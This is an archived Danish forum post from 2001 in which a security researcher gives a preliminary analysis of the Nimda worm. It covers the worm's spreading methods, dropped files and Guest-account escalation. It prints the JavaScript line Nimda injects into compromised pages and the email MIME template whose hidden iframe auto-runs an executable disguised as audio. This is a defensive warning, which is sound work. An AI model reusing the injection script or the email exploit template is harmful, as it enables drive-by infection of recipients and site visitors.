Kandu.dk - Alvorlig virus i omløb


/ Forside / Teknologi / Internet / Sikkerhed / Nyhedsindlæg

Glemt dit kodeord?

Brugernavn*

Kodeord *

Husk mig

Brugerservice

Kom godt i gang

Bliv medlem

Seneste indlæg

Find en bruger

Stil et spørgsmål

Skriv et tip

Fortæl en ven

Pointsystemet

Kontakt Kandu.dk

Emnevisning

Kategorier

Alfabetisk

Karriere

Interesser

Teknologi

Reklame

Top 10 brugere

Sikkerhed

#	Navn	Point
1	stl_s	37026
2	arlet	26827
3	miritdk	20260
4	o.v.n.	12167
5	als	8951
6	refi	8694
7	tedd	8272
8	BjarneD	7338
9	Klaudi	7257
10	molokyle	6481

Alvorlig virus i omløb
Fra : Peter Kruse

Dato : 18-09-01 17:32

Her følger foreløb analyse!

Høj risiko virus i omløb!!

Navn: W32.Nimda.worm
Risiko: HØJ
Oprindelse: ?

W32.Nimda.worm er en høj risiko virus som spreder sig ved at udnytte en
sårbarhed i Outlook (IFrame ). Denne orm er krydsinficerende og udnytter
samtlige kendte sårbarheder, som kan afvikle (remotely) kode på Microsoft
IIS 4.0 og 5.0 (den laver alle tænke GET kommandoer). Derudover spreder den
sig fra inficerede hjemmesider via Iframe sårbarheden som tillader at kode
afvikles automatisk uden interaktion fra brugeren hvis maskinen ikke er
opdateret. Ormen tilføjen følgende streng til hjemmeside som er blevet
kompromitteret: "
<html><script language="JavaScript">window.open("readme.eml", null,
"resizable=no,top=6000,left=6000")</script></html>". Vi tæller allerede nu
adskillige hundrende danske hjemmesider.

Ormen indeholder teksten: "Concept Virus(CV) V.5, Copyright(C)2001
R.P.China". Det er højest sandsynligt, at den udspringer fra andre kilder
end den indlysende signatur.

Fra private PC'ere sender den sig selv videre til samtlige fortegnelser i
Outlooks adressekartotek ligesom den spreder sig via Netværk shares. Det
sker via SMB/CIFS som "C$" hvor den tilføjer en Guest konto til den lokale
administrator gruppe.

Den dropper derudover mindst 4 filer i mappen:
(root)\Program Files\Common Files\msadc\
root.exe, TFTP129.exe, TFTP68.exe, TFTP192.exe.

En inficeret email vil ankomme med følgende header:

Emne:
Xdesktopdesktopdesktopdesktopsamplesampledesktopsamplesamplesamplesampledesk
topdesktopsamplesampledesktopsamplesampledesktopdesktopsamplesamplesample

MIME-Version: 1.0

Content-Type: multipart/related;
type="multipart/alternative";
boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1

====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
boundary="====_ABC0987654321DEF_===="

====_ABC0987654321DEF_====
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>
====_ABC0987654321DEF_====--

--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>

Venligst
Peter Kruse
Telia Security- and Virusreseach

Søg

Reklame

Statistik

Spørgsmål :	177501
Tips :	31968
Nyheder :	719565
Indlæg :	6408527
Brugere :	218887

Månedens bedste

Årets bedste

Sidste års bedste